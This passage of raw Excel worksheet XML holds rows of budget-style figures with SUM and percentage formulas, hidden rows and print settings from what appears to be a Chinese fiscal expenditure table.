      </c>
      <c r="B18" s="137">
        <v>8822</v>
      </c>
      <c r="C18" s="137">
        <v>8500</v>
      </c>
      <c r="D18" s="105">
        <f t="shared" si="1"/>
        <v>96.35003400589436</v>
      </c>
      <c r="E18" s="20"/>
    </row>
    <row r="19" spans="1:5" ht="21.75" customHeight="1">
      <c r="A19" s="175" t="s">
        <v>344</v>
      </c>
      <c r="B19" s="137">
        <v>7996</v>
      </c>
      <c r="C19" s="137">
        <v>8000</v>
      </c>
      <c r="D19" s="105">
        <f t="shared" si="1"/>
        <v>100.05002501250625</v>
      </c>
      <c r="E19" s="20"/>
    </row>
    <row r="20" spans="1:5" ht="21.75" customHeight="1">
      <c r="A20" s="17" t="s">
        <v>345</v>
      </c>
      <c r="B20" s="137">
        <v>5186</v>
      </c>
      <c r="C20" s="137">
        <v>5250</v>
      </c>
      <c r="D20" s="105">
        <f t="shared" si="1"/>
        <v>101.23409178557655</v>
      </c>
      <c r="E20" s="20"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:E1"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.51" footer="0.51"/>
  <pageSetup firstPageNumber="13" useFirstPageNumber="1" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>
  <headerFooter>
    <oddFooter>&amp;C第 13 页</oddFooter>
  </headerFooter>
</worksheet>
</file>

<file path=xl/worksheets/sheet14.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:G1275"/>
  <sheetViews>
    <sheetView showGridLines="0" showZeros="0" zoomScale="115" zoomScaleNormal="115" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="4" topLeftCell="A906" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="E916" sqref="E916"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="17.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="45.375" style="160" customWidth="1"/>
    <col min="2" max="2" width="10.125" style="158" customWidth="1"/>
    <col min="3" max="3" width="13.25390625" style="158" customWidth="1"/>
    <col min="4" max="4" width="10.50390625" style="158" customWidth="1"/>
    <col min="5" max="5" width="13.875" style="158" customWidth="1"/>
    <col min="6" max="6" width="14.25390625" style="161" customWidth="1"/>
    <col min="7" max="7" width="29.625" style="162" customWidth="1"/>
    <col min="8" max="16384" width="9.00390625" style="160" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" s="158" customFormat="1" ht="25.5" customHeight="1">
      <c r="A1" s="163" t="s">
        <v>369</v>
      </c>
      <c r="B1" s="163"/>
      <c r="C1" s="163"/>
      <c r="D1" s="163"/>
      <c r="E1" s="163"/>
      <c r="F1" s="163"/>
      <c r="G1" s="163"/>
    </row>
    <row r="2" spans="1:7" ht="17.25" customHeight="1">
      <c r="A2" s="164" t="s">
        <v>370</v>
      </c>
      <c r="D2" s="165"/>
      <c r="E2" s="165"/>
      <c r="F2" s="166"/>
      <c r="G2" s="167" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="3" spans="1:7" ht="36" customHeight="1">
      <c r="A3" s="168" t="s">
        <v>298</v>
      </c>
      <c r="B3" s="168" t="s">
        <v>359</v>
      </c>
      <c r="C3" s="168" t="s">
        <v>360</v>
      </c>
      <c r="D3" s="168" t="s">
        <v>361</v>
      </c>
      <c r="E3" s="168" t="s">
        <v>360</v>
      </c>
      <c r="F3" s="168" t="s">
        <v>362</v>
      </c>
      <c r="G3" s="168" t="s">
        <v>356</v>
      </c>
    </row>
    <row r="4" spans="1:7" ht="20.25" customHeight="1">
      <c r="A4" s="125" t="s">
        <v>363</v>
      </c>
      <c r="B4" s="169">
        <f>SUM(B5,B249,B253,B265,B356,B409,B463,B520,B640,B712,B785,B804,B915,B979,B1045,B1065,B1080,B1090,B1134,B1154,B1207,B1264,B1265,B1271,B1273)</f>
        <v>726069</v>
      </c>
      <c r="C4" s="169">
        <f>SUM(C5,C249,C253,C265,C356,C409,C463,C520,C640,C712,C785,C804,C915,C979,C1045,C1065,C1080,C1090,C1134,C1154,C1207,C1264,C1265,C1271,C1273)</f>
        <v>339430</v>
      </c>
      <c r="D4" s="169">
        <f>SUM(D5,D249,D253,D265,D356,D409,D463,D520,D640,D712,D785,D804,D915,D979,D1045,D1065,D1080,D1090,D1134,D1154,D1207,D1264,D1265,D1271,D1273)</f>
        <v>859370</v>
      </c>
      <c r="E4" s="170">
        <f>SUM(E5,E249,E253,E265,E356,E409,E463,E520,E640,E712,E785,E804,E915,E979,E1045,E1065,E1080,E1090,E1134,E1154,E1207,E1264,E1265,E1271,E1273)</f>
        <v>359992</v>
      </c>
      <c r="F4" s="171">
        <f aca="true" t="shared" si="0" ref="F4:F8">E4/C4*100</f>
        <v>106.0578027870253</v>
      </c>
      <c r="G4" s="172"/>
    </row>
    <row r="5" spans="1:7" ht="17.25" customHeight="1">
      <c r="A5" s="128" t="s">
        <v>305</v>
      </c>
      <c r="B5" s="100">
        <f>SUM(B6,B18,B27,B38,B49,B60,B71,B83,B92,B105,B115,B124,B135,B148,B155,B163,B169,B176,B183,B190,B197,B204,B212,B218,B224,B231,B246)</f>
        <v>50468</v>
      </c>
      <c r="C5" s="100">
        <f>SUM(C6,C18,C27,C38,C49,C60,C71,C83,C92,C105,C115,C124,C135,C148,C155,C163,C169,C176,C183,C190,C197,C204,C212,C218,C224,C231,C246)</f>
        <v>46220</v>
      </c>
      <c r="D5" s="100">
        <f>SUM(D6,D18,D27,D38,D49,D60,D71,D83,D92,D105,D115,D124,D135,D148,D155,D163,D169,D176,D183,D190,D197,D204,D212,D218,D224,D231,D246)</f>
        <v>56624</v>
      </c>
      <c r="E5" s="173">
        <f>SUM(E6,E18,E27,E38,E49,E60,E71,E83,E92,E105,E115,E124,E135,E148,E155,E163,E169,E176,E183,E190,E197,E204,E212,E218,E224,E231,E246)</f>
        <v>48499</v>
      </c>
      <c r="F5" s="174">
        <f t="shared" si="0"/>
        <v>104.93076590220684</v>
      </c>
      <c r="G5" s="172"/>
    </row>
    <row r="6" spans="1:7" ht="17.25" customHeight="1">
      <c r="A6" s="128" t="s">
        <v>371</v>
      </c>
      <c r="B6" s="100">
        <f>SUM(B7:B17)</f>
        <v>1218</v>
      </c>
      <c r="C6" s="100">
        <f>SUM(C7:C17)</f>
        <v>1218</v>
      </c>
      <c r="D6" s="100">
        <f>SUM(D7:D17)</f>
        <v>1370</v>
      </c>
      <c r="E6" s="173">
        <f>SUM(E7:E17)</f>
        <v>1370</v>
      </c>
      <c r="F6" s="174">
        <f t="shared" si="0"/>
        <v>112.47947454844007</v>
      </c>
      <c r="G6" s="172"/>
    </row>
    <row r="7" spans="1:7" ht="17.25" customHeight="1">
      <c r="A7" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B7" s="100">
        <v>578</v>
      </c>
      <c r="C7" s="100">
        <v>578</v>
      </c>
      <c r="D7" s="100">
        <v>628</v>
      </c>
      <c r="E7" s="173">
        <v>628</v>
      </c>
      <c r="F7" s="174">
        <f t="shared" si="0"/>
        <v>108.65051903114187</v>
      </c>
      <c r="G7" s="172"/>
    </row>
    <row r="8" spans="1:7" ht="17.25" customHeight="1">
      <c r="A8" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B8" s="100">
        <v>415</v>
      </c>
      <c r="C8" s="100">
        <v>415</v>
      </c>
      <c r="D8" s="100">
        <v>311</v>
      </c>
      <c r="E8" s="173">
        <v>311</v>
      </c>
      <c r="F8" s="174">
        <f t="shared" si="0"/>
        <v>74.93975903614458</v>
      </c>
      <c r="G8" s="172"/>
    </row>
    <row r="9" spans="1:7" ht="17.25" customHeight="1">
      <c r="A9" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B9" s="100">
        <v>0</v>
      </c>
      <c r="C9" s="100"/>
      <c r="D9" s="100">
        <v>56</v>
      </c>
      <c r="E9" s="173">
        <v>56</v>
      </c>
      <c r="F9" s="174"/>
      <c r="G9" s="172"/>
    </row>
    <row r="10" spans="1:7" ht="17.25" customHeight="1">
      <c r="A10" s="128" t="s">
        <v>375</v>
      </c>
      <c r="B10" s="173">
        <v>225</v>
      </c>
      <c r="C10" s="173">
        <v>225</v>
      </c>
      <c r="D10" s="173">
        <v>225</v>
      </c>
      <c r="E10" s="173">
        <v>225</v>
      </c>
      <c r="F10" s="174">
        <f>E10/C10*100</f>
        <v>100</v>
      </c>
      <c r="G10" s="172"/>
    </row>
    <row r="11" spans="1:7" ht="17.25" customHeight="1">
      <c r="A11" s="128" t="s">
        <v>376</v>
      </c>
      <c r="B11" s="100">
        <v>0</v>
      </c>
      <c r="C11" s="100"/>
      <c r="D11" s="100">
        <v>130</v>
      </c>
      <c r="E11" s="173">
        <v>130</v>
      </c>
      <c r="F11" s="174"/>
      <c r="G11" s="172"/>
    </row>
    <row r="12" spans="1:7" ht="17.25" customHeight="1">
      <c r="A12" s="128" t="s">
        <v>377</v>
      </c>
      <c r="B12" s="100">
        <v>0</v>
      </c>
      <c r="C12" s="100"/>
      <c r="D12" s="100">
        <v>20</v>
      </c>
      <c r="E12" s="173">
        <v>20</v>
      </c>
      <c r="F12" s="174"/>
      <c r="G12" s="172"/>
    </row>
    <row r="13" spans="1:7" ht="17.25" customHeight="1">
      <c r="A13" s="128" t="s">
        <v>378</v>
      </c>
      <c r="B13" s="100">
        <v>0</v>
      </c>
      <c r="C13" s="100"/>
      <c r="D13" s="100">
        <v>0</v>
      </c>
      <c r="E13" s="173"/>
      <c r="F13" s="174"/>
      <c r="G13" s="172"/>
    </row>
    <row r="14" spans="1:7" ht="17.25" customHeight="1">
      <c r="A14" s="128" t="s">
        <v>379</v>
      </c>
      <c r="B14" s="100">
        <v>0</v>
      </c>
      <c r="C14" s="100"/>
      <c r="D14" s="100">
        <v>0</v>
      </c>
      <c r="E14" s="173"/>
      <c r="F14" s="174"/>
      <c r="G14" s="172"/>
    </row>
    <row r="15" spans="1:7" ht="17.25" customHeight="1">
      <c r="A15" s="128" t="s">
        <v>380</v>
      </c>
      <c r="B15" s="100">
        <v>0</v>
      </c>
      <c r="C15" s="100"/>
      <c r="D15" s="100">
        <v>0</v>
      </c>
      <c r="E15" s="173"/>
      <c r="F15" s="174"/>
      <c r="G15" s="172"/>
    </row>
    <row r="16" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A16" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B16" s="100">
        <v>0</v>
      </c>
      <c r="C16" s="100"/>
      <c r="D16" s="100">
        <v>0</v>
      </c>
      <c r="E16" s="173"/>
      <c r="F16" s="174"/>
      <c r="G16" s="172"/>
    </row>
    <row r="17" spans="1:7" ht="17.25" customHeight="1">
      <c r="A17" s="128" t="s">
        <v>382</v>
      </c>
      <c r="B17" s="100">
        <v>0</v>
      </c>
      <c r="C17" s="100"/>
      <c r="D17" s="100">
        <v>0</v>
      </c>
      <c r="E17" s="173"/>
      <c r="F17" s="174"/>
      <c r="G17" s="172"/>
    </row>
    <row r="18" spans="1:7" ht="17.25" customHeight="1">
      <c r="A18" s="128" t="s">
        <v>383</v>
      </c>
      <c r="B18" s="100">
        <f>SUM(B19:B26)</f>
        <v>821</v>
      </c>
      <c r="C18" s="100">
        <f>SUM(C19:C26)</f>
        <v>821</v>
      </c>
      <c r="D18" s="100">
        <f>SUM(D19:D26)</f>
        <v>846</v>
      </c>
      <c r="E18" s="173">
        <f>SUM(E19:E26)</f>
        <v>846</v>
      </c>
      <c r="F18" s="174">
        <f aca="true" t="shared" si="1" ref="F18:F20">E18/C18*100</f>
        <v>103.04506699147382</v>
      </c>
      <c r="G18" s="172"/>
    </row>
    <row r="19" spans="1:7" ht="17.25" customHeight="1">
      <c r="A19" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B19" s="100">
        <v>466</v>
      </c>
      <c r="C19" s="100">
        <v>466</v>
      </c>
      <c r="D19" s="100">
        <v>526</v>
      </c>
      <c r="E19" s="173">
        <v>526</v>
      </c>
      <c r="F19" s="174">
        <f t="shared" si="1"/>
        <v>112.87553648068669</v>
      </c>
      <c r="G19" s="172"/>
    </row>
    <row r="20" spans="1:7" ht="17.25" customHeight="1">
      <c r="A20" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B20" s="100">
        <v>145</v>
      </c>
      <c r="C20" s="100">
        <v>145</v>
      </c>
      <c r="D20" s="100">
        <v>132</v>
      </c>
      <c r="E20" s="173">
        <v>132</v>
      </c>
      <c r="F20" s="174">
        <f t="shared" si="1"/>
        <v>91.0344827586207</v>
      </c>
      <c r="G20" s="172"/>
    </row>
    <row r="21" spans="1:7" ht="17.25" customHeight="1">
      <c r="A21" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B21" s="100">
        <v>0</v>
      </c>
      <c r="C21" s="100"/>
      <c r="D21" s="100">
        <v>0</v>
      </c>
      <c r="E21" s="173"/>
      <c r="F21" s="174"/>
      <c r="G21" s="172"/>
    </row>
    <row r="22" spans="1:7" ht="17.25" customHeight="1">
      <c r="A22" s="128" t="s">
        <v>384</v>
      </c>
      <c r="B22" s="100">
        <v>210</v>
      </c>
      <c r="C22" s="100">
        <v>210</v>
      </c>
      <c r="D22" s="100">
        <v>168</v>
      </c>
      <c r="E22" s="173">
        <v>168</v>
      </c>
      <c r="F22" s="174">
        <f>E22/C22*100</f>
        <v>80</v>
      </c>
      <c r="G22" s="172"/>
    </row>
    <row r="23" spans="1:7" ht="17.25" customHeight="1">
      <c r="A23" s="128" t="s">
        <v>385</v>
      </c>
      <c r="B23" s="100">
        <v>0</v>
      </c>
      <c r="C23" s="100"/>
      <c r="D23" s="100">
        <v>0</v>
      </c>
      <c r="E23" s="173"/>
      <c r="F23" s="174"/>
      <c r="G23" s="172"/>
    </row>
    <row r="24" spans="1:7" ht="17.25" customHeight="1">
      <c r="A24" s="128" t="s">
        <v>386</v>
      </c>
      <c r="B24" s="100">
        <v>0</v>
      </c>
      <c r="C24" s="100"/>
      <c r="D24" s="100">
        <v>20</v>
      </c>
      <c r="E24" s="173">
        <v>20</v>
      </c>
      <c r="F24" s="174"/>
      <c r="G24" s="172"/>
    </row>
    <row r="25" spans="1:7" ht="17.25" customHeight="1">
      <c r="A25" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B25" s="100">
        <v>0</v>
      </c>
      <c r="C25" s="100"/>
      <c r="D25" s="100">
        <v>0</v>
      </c>
      <c r="E25" s="173"/>
      <c r="F25" s="174"/>
      <c r="G25" s="172"/>
    </row>
    <row r="26" spans="1:7" ht="17.25" customHeight="1">
      <c r="A26" s="128" t="s">
        <v>387</v>
      </c>
      <c r="B26" s="100">
        <v>0</v>
      </c>
      <c r="C26" s="100"/>
      <c r="D26" s="100">
        <v>0</v>
      </c>
      <c r="E26" s="173"/>
      <c r="F26" s="174"/>
      <c r="G26" s="172"/>
    </row>
    <row r="27" spans="1:7" ht="17.25" customHeight="1">
      <c r="A27" s="128" t="s">
        <v>388</v>
      </c>
      <c r="B27" s="100">
        <f>SUM(B28:B37)</f>
        <v>12253</v>
      </c>
      <c r="C27" s="100">
        <f>SUM(C28:C37)</f>
        <v>12172</v>
      </c>
      <c r="D27" s="100">
        <f>SUM(D28:D37)</f>
        <v>13803</v>
      </c>
      <c r="E27" s="173">
        <f>SUM(E28:E37)</f>
        <v>13803</v>
      </c>
      <c r="F27" s="174">
        <f aca="true" t="shared" si="2" ref="F27:F29">E27/C27*100</f>
        <v>113.3996056523168</v>
      </c>
      <c r="G27" s="172"/>
    </row>
    <row r="28" spans="1:7" ht="17.25" customHeight="1">
      <c r="A28" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B28" s="100">
        <v>2930</v>
      </c>
      <c r="C28" s="100">
        <v>2930</v>
      </c>
      <c r="D28" s="100">
        <v>4544</v>
      </c>
      <c r="E28" s="173">
        <v>4544</v>
      </c>
      <c r="F28" s="174">
        <f t="shared" si="2"/>
        <v>155.0853242320819</v>
      </c>
      <c r="G28" s="172"/>
    </row>
    <row r="29" spans="1:7" s="159" customFormat="1" ht="17.25" customHeight="1">
      <c r="A29" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B29" s="100">
        <v>666</v>
      </c>
      <c r="C29" s="100">
        <v>666</v>
      </c>
      <c r="D29" s="100">
        <v>910</v>
      </c>
      <c r="E29" s="173">
        <v>910</v>
      </c>
      <c r="F29" s="174">
        <f t="shared" si="2"/>
        <v>136.63663663663664</v>
      </c>
      <c r="G29" s="172"/>
    </row>
    <row r="30" spans="1:7" ht="17.25" customHeight="1">
      <c r="A30" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B30" s="100">
        <v>0</v>
      </c>
      <c r="C30" s="100"/>
      <c r="D30" s="100">
        <v>0</v>
      </c>
      <c r="E30" s="173"/>
      <c r="F30" s="174"/>
      <c r="G30" s="172"/>
    </row>
    <row r="31" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A31" s="128" t="s">
        <v>389</v>
      </c>
      <c r="B31" s="100">
        <v>0</v>
      </c>
      <c r="C31" s="100"/>
      <c r="D31" s="100">
        <v>0</v>
      </c>
      <c r="E31" s="173"/>
      <c r="F31" s="174"/>
      <c r="G31" s="172"/>
    </row>
    <row r="32" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A32" s="128" t="s">
        <v>390</v>
      </c>
      <c r="B32" s="100">
        <v>0</v>
      </c>
      <c r="C32" s="100"/>
      <c r="D32" s="100">
        <v>0</v>
      </c>
      <c r="E32" s="173"/>
      <c r="F32" s="174"/>
      <c r="G32" s="172"/>
    </row>
    <row r="33" spans="1:7" ht="17.25" customHeight="1">
      <c r="A33" s="128" t="s">
        <v>391</v>
      </c>
      <c r="B33" s="100">
        <v>0</v>
      </c>
      <c r="C33" s="100"/>
      <c r="D33" s="100">
        <v>25</v>
      </c>
      <c r="E33" s="173">
        <v>25</v>
      </c>
      <c r="F33" s="174"/>
      <c r="G33" s="172"/>
    </row>
    <row r="34" spans="1:7" ht="17.25" customHeight="1">
      <c r="A34" s="128" t="s">
        <v>392</v>
      </c>
      <c r="B34" s="100">
        <f>273+100</f>
        <v>373</v>
      </c>
      <c r="C34" s="100">
        <f>250+100</f>
        <v>350</v>
      </c>
      <c r="D34" s="100">
        <v>345</v>
      </c>
      <c r="E34" s="173">
        <v>345</v>
      </c>
      <c r="F34" s="174">
        <f aca="true" t="shared" si="3" ref="F34:F39">E34/C34*100</f>
        <v>98.57142857142858</v>
      </c>
      <c r="G34" s="172"/>
    </row>
    <row r="35" spans="1:7" ht="17.25" customHeight="1">
      <c r="A35" s="128" t="s">
        <v>393</v>
      </c>
      <c r="B35" s="100">
        <v>0</v>
      </c>
      <c r="C35" s="100"/>
      <c r="D35" s="100">
        <v>0</v>
      </c>
      <c r="E35" s="173"/>
      <c r="F35" s="174"/>
      <c r="G35" s="172"/>
    </row>
    <row r="36" spans="1:7" ht="17.25" customHeight="1">
      <c r="A36" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B36" s="100">
        <v>2708</v>
      </c>
      <c r="C36" s="100">
        <v>2708</v>
      </c>
      <c r="D36" s="100">
        <v>1139</v>
      </c>
      <c r="E36" s="173">
        <v>1139</v>
      </c>
      <c r="F36" s="174">
        <f t="shared" si="3"/>
        <v>42.06056129985229</v>
      </c>
      <c r="G36" s="172"/>
    </row>
    <row r="37" spans="1:7" ht="17.25" customHeight="1">
      <c r="A37" s="128" t="s">
        <v>394</v>
      </c>
      <c r="B37" s="100">
        <f>3581+1995</f>
        <v>5576</v>
      </c>
      <c r="C37" s="100">
        <f>3523+1995</f>
        <v>5518</v>
      </c>
      <c r="D37" s="100">
        <f>5995+845</f>
        <v>6840</v>
      </c>
      <c r="E37" s="173">
        <f>5995+845</f>
        <v>6840</v>
      </c>
      <c r="F37" s="174">
        <f t="shared" si="3"/>
        <v>123.9579557810801</v>
      </c>
      <c r="G37" s="172"/>
    </row>
    <row r="38" spans="1:7" ht="17.25" customHeight="1">
      <c r="A38" s="128" t="s">
        <v>395</v>
      </c>
      <c r="B38" s="100">
        <f>SUM(B39:B48)</f>
        <v>1915</v>
      </c>
      <c r="C38" s="100">
        <f>SUM(C39:C48)</f>
        <v>1755</v>
      </c>
      <c r="D38" s="100">
        <f>SUM(D39:D48)</f>
        <v>1768</v>
      </c>
      <c r="E38" s="173">
        <f>SUM(E39:E48)</f>
        <v>1728</v>
      </c>
      <c r="F38" s="174">
        <f t="shared" si="3"/>
        <v>98.46153846153847</v>
      </c>
      <c r="G38" s="172"/>
    </row>
    <row r="39" spans="1:7" ht="17.25" customHeight="1">
      <c r="A39" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B39" s="100">
        <v>1125</v>
      </c>
      <c r="C39" s="100">
        <v>1125</v>
      </c>
      <c r="D39" s="100">
        <v>1091</v>
      </c>
      <c r="E39" s="173">
        <v>1091</v>
      </c>
      <c r="F39" s="174">
        <f t="shared" si="3"/>
        <v>96.97777777777777</v>
      </c>
      <c r="G39" s="172"/>
    </row>
    <row r="40" spans="1:7" ht="17.25" customHeight="1">
      <c r="A40" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B40" s="100">
        <v>160</v>
      </c>
      <c r="C40" s="100"/>
      <c r="D40" s="100">
        <v>0</v>
      </c>
      <c r="E40" s="173"/>
      <c r="F40" s="174"/>
      <c r="G40" s="172"/>
    </row>
    <row r="41" spans="1:7" ht="17.25" customHeight="1">
      <c r="A41" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B41" s="100">
        <v>0</v>
      </c>
      <c r="C41" s="100"/>
      <c r="D41" s="100">
        <v>0</v>
      </c>
      <c r="E41" s="173"/>
      <c r="F41" s="174"/>
      <c r="G41" s="172"/>
    </row>
    <row r="42" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A42" s="128" t="s">
        <v>396</v>
      </c>
      <c r="B42" s="100">
        <v>0</v>
      </c>
      <c r="C42" s="100"/>
      <c r="D42" s="100">
        <v>0</v>
      </c>
      <c r="E42" s="173"/>
      <c r="F42" s="174"/>
      <c r="G42" s="172"/>
    </row>
    <row r="43" spans="1:7" ht="17.25" customHeight="1">
      <c r="A43" s="128" t="s">
        <v>397</v>
      </c>
      <c r="B43" s="100">
        <v>0</v>
      </c>
      <c r="C43" s="100"/>
      <c r="D43" s="100">
        <v>0</v>
      </c>
      <c r="E43" s="173"/>
      <c r="F43" s="174"/>
      <c r="G43" s="172"/>
    </row>
    <row r="44" spans="1:7" ht="17.25" customHeight="1">
      <c r="A44" s="128" t="s">
        <v>398</v>
      </c>
      <c r="B44" s="100">
        <v>0</v>
      </c>
      <c r="C44" s="100"/>
      <c r="D44" s="100">
        <v>200</v>
      </c>
      <c r="E44" s="173">
        <v>200</v>
      </c>
      <c r="F44" s="174"/>
      <c r="G44" s="172"/>
    </row>
    <row r="45" spans="1:7" ht="17.25" customHeight="1">
      <c r="A45" s="128" t="s">
        <v>399</v>
      </c>
      <c r="B45" s="100">
        <v>0</v>
      </c>
      <c r="C45" s="100"/>
      <c r="D45" s="100">
        <v>0</v>
      </c>
      <c r="E45" s="173"/>
      <c r="F45" s="174"/>
      <c r="G45" s="172"/>
    </row>
    <row r="46" spans="1:7" ht="17.25" customHeight="1">
      <c r="A46" s="128" t="s">
        <v>400</v>
      </c>
      <c r="B46" s="100">
        <v>0</v>
      </c>
      <c r="C46" s="100"/>
      <c r="D46" s="100">
        <v>15</v>
      </c>
      <c r="E46" s="173">
        <v>15</v>
      </c>
      <c r="F46" s="174"/>
      <c r="G46" s="172"/>
    </row>
    <row r="47" spans="1:7" ht="17.25" customHeight="1">
      <c r="A47" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B47" s="100">
        <v>130</v>
      </c>
      <c r="C47" s="100">
        <v>130</v>
      </c>
      <c r="D47" s="100">
        <v>149</v>
      </c>
      <c r="E47" s="173">
        <v>149</v>
      </c>
      <c r="F47" s="174">
        <f aca="true" t="shared" si="4" ref="F47:F51">E47/C47*100</f>
        <v>114.61538461538461</v>
      </c>
      <c r="G47" s="172"/>
    </row>
    <row r="48" spans="1:7" ht="17.25" customHeight="1">
      <c r="A48" s="128" t="s">
        <v>401</v>
      </c>
      <c r="B48" s="100">
        <v>500</v>
      </c>
      <c r="C48" s="100">
        <v>500</v>
      </c>
      <c r="D48" s="100">
        <v>313</v>
      </c>
      <c r="E48" s="173">
        <v>273</v>
      </c>
      <c r="F48" s="174">
        <f t="shared" si="4"/>
        <v>54.6</v>
      </c>
      <c r="G48" s="172"/>
    </row>
    <row r="49" spans="1:7" ht="17.25" customHeight="1">
      <c r="A49" s="128" t="s">
        <v>402</v>
      </c>
      <c r="B49" s="100">
        <f>SUM(B50:B59)</f>
        <v>604</v>
      </c>
      <c r="C49" s="100">
        <f>SUM(C50:C59)</f>
        <v>604</v>
      </c>
      <c r="D49" s="100">
        <f>SUM(D50:D59)</f>
        <v>880</v>
      </c>
      <c r="E49" s="173">
        <f>SUM(E50:E59)</f>
        <v>880</v>
      </c>
      <c r="F49" s="174">
        <f t="shared" si="4"/>
        <v>145.69536423841058</v>
      </c>
      <c r="G49" s="172"/>
    </row>
    <row r="50" spans="1:7" ht="17.25" customHeight="1">
      <c r="A50" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B50" s="100">
        <v>439</v>
      </c>
      <c r="C50" s="100">
        <v>439</v>
      </c>
      <c r="D50" s="100">
        <v>470</v>
      </c>
      <c r="E50" s="173">
        <v>470</v>
      </c>
      <c r="F50" s="174">
        <f t="shared" si="4"/>
        <v>107.0615034168565</v>
      </c>
      <c r="G50" s="172"/>
    </row>
    <row r="51" spans="1:7" ht="17.25" customHeight="1">
      <c r="A51" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B51" s="100">
        <v>65</v>
      </c>
      <c r="C51" s="100">
        <v>65</v>
      </c>
      <c r="D51" s="100">
        <v>210</v>
      </c>
      <c r="E51" s="173">
        <v>210</v>
      </c>
      <c r="F51" s="174">
        <f t="shared" si="4"/>
        <v>323.0769230769231</v>
      </c>
      <c r="G51" s="172" t="s">
        <v>403</v>
      </c>
    </row>
    <row r="52" spans="1:7" ht="17.25" customHeight="1">
      <c r="A52" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B52" s="100">
        <v>0</v>
      </c>
      <c r="C52" s="100"/>
      <c r="D52" s="100">
        <v>0</v>
      </c>
      <c r="E52" s="173"/>
      <c r="F52" s="174"/>
      <c r="G52" s="172"/>
    </row>
    <row r="53" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A53" s="128" t="s">
        <v>404</v>
      </c>
      <c r="B53" s="100">
        <v>0</v>
      </c>
      <c r="C53" s="100"/>
      <c r="D53" s="100">
        <v>0</v>
      </c>
      <c r="E53" s="173"/>
      <c r="F53" s="174"/>
      <c r="G53" s="172"/>
    </row>
    <row r="54" spans="1:7" ht="17.25" customHeight="1">
      <c r="A54" s="128" t="s">
        <v>405</v>
      </c>
      <c r="B54" s="100">
        <v>0</v>
      </c>
      <c r="C54" s="100"/>
      <c r="D54" s="100">
        <v>0</v>
      </c>
      <c r="E54" s="173"/>
      <c r="F54" s="174"/>
      <c r="G54" s="172"/>
    </row>
    <row r="55" spans="1:7" ht="17.25" customHeight="1">
      <c r="A55" s="128" t="s">
        <v>406</v>
      </c>
      <c r="B55" s="100">
        <v>0</v>
      </c>
      <c r="C55" s="100"/>
      <c r="D55" s="100">
        <v>0</v>
      </c>
      <c r="E55" s="173"/>
      <c r="F55" s="174"/>
      <c r="G55" s="172"/>
    </row>
    <row r="56" spans="1:7" ht="17.25" customHeight="1">
      <c r="A56" s="128" t="s">
        <v>407</v>
      </c>
      <c r="B56" s="100">
        <v>100</v>
      </c>
      <c r="C56" s="100">
        <v>100</v>
      </c>
      <c r="D56" s="100">
        <v>200</v>
      </c>
      <c r="E56" s="173">
        <v>200</v>
      </c>
      <c r="F56" s="174">
        <f aca="true" t="shared" si="5" ref="F56:F62">E56/C56*100</f>
        <v>200</v>
      </c>
      <c r="G56" s="172" t="s">
        <v>408</v>
      </c>
    </row>
    <row r="57" spans="1:7" ht="17.25" customHeight="1">
      <c r="A57" s="128" t="s">
        <v>409</v>
      </c>
      <c r="B57" s="100">
        <v>0</v>
      </c>
      <c r="C57" s="100"/>
      <c r="D57" s="100">
        <v>0</v>
      </c>
      <c r="E57" s="173"/>
      <c r="F57" s="174"/>
      <c r="G57" s="172"/>
    </row>
    <row r="58" spans="1:7" ht="17.25" customHeight="1">
      <c r="A58" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B58" s="100">
        <v>0</v>
      </c>
      <c r="C58" s="100"/>
      <c r="D58" s="100">
        <v>0</v>
      </c>
      <c r="E58" s="173"/>
      <c r="F58" s="174"/>
      <c r="G58" s="172"/>
    </row>
    <row r="59" spans="1:7" ht="17.25" customHeight="1">
      <c r="A59" s="128" t="s">
        <v>410</v>
      </c>
      <c r="B59" s="100">
        <v>0</v>
      </c>
      <c r="C59" s="100"/>
      <c r="D59" s="100">
        <v>0</v>
      </c>
      <c r="E59" s="173"/>
      <c r="F59" s="174"/>
      <c r="G59" s="172"/>
    </row>
    <row r="60" spans="1:7" ht="17.25" customHeight="1">
      <c r="A60" s="128" t="s">
        <v>411</v>
      </c>
      <c r="B60" s="100">
        <f>SUM(B61:B70)</f>
        <v>1764</v>
      </c>
      <c r="C60" s="100">
        <f>SUM(C61:C70)</f>
        <v>1764</v>
      </c>
      <c r="D60" s="100">
        <f>SUM(D61:D70)</f>
